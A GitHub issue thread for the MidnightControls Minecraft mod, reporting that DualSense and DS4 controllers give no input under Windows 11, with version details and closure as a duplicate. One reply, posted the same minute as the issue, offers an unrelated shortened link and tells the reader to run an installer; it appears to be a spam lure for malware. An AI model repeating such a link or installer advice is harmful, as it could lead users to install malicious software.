### ISSUE TITLE
Controller Issues: DualSense

### ISSUE THREAD

**Issue by spedwagoon42** [TeamMidnightDust/MidnightControls#304] opened 2024-09-02 23:29 UTC
**Describe the current state**
No inputs working - Additionally, when I try to rebind any button, it immediately maps to R2+L2 with no physical input on controller. This is also happening with DS4 controller.

**To Reproduce**

**Expected behavior**

**Screenshots**
If applicable, add screenshots or videos to help explain your problem.

**Desktop (please complete the following information):**
 - Have you checked #263 for your controller? **YES**
 - Connection method **BLUETOOTH**

 - OS: **WINDOWS 11 HOME 23H2**
 - Minecraft **1.21.1**
 - Modloader FABRIC LOADER 0.16.3-1.21.1
 - Fabric/Quilt Libraries **FABRIC API 0.103.0-1.21.1**
 - Mods **NONE BESIDES MIDNIGHT CONTROLS**
 - Version **1.9.7-1.21**

**Additional context**
In case of a crash, please provide the crash log.

**Comment by 777Naity** [comment] 2024-09-02 23:29
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by Motschen** [comment] 2024-10-20 14:51
Duplicate of #179

**Closed as not planned by Motschen** 2024-10-20 14:51 UTC
Labels: controller
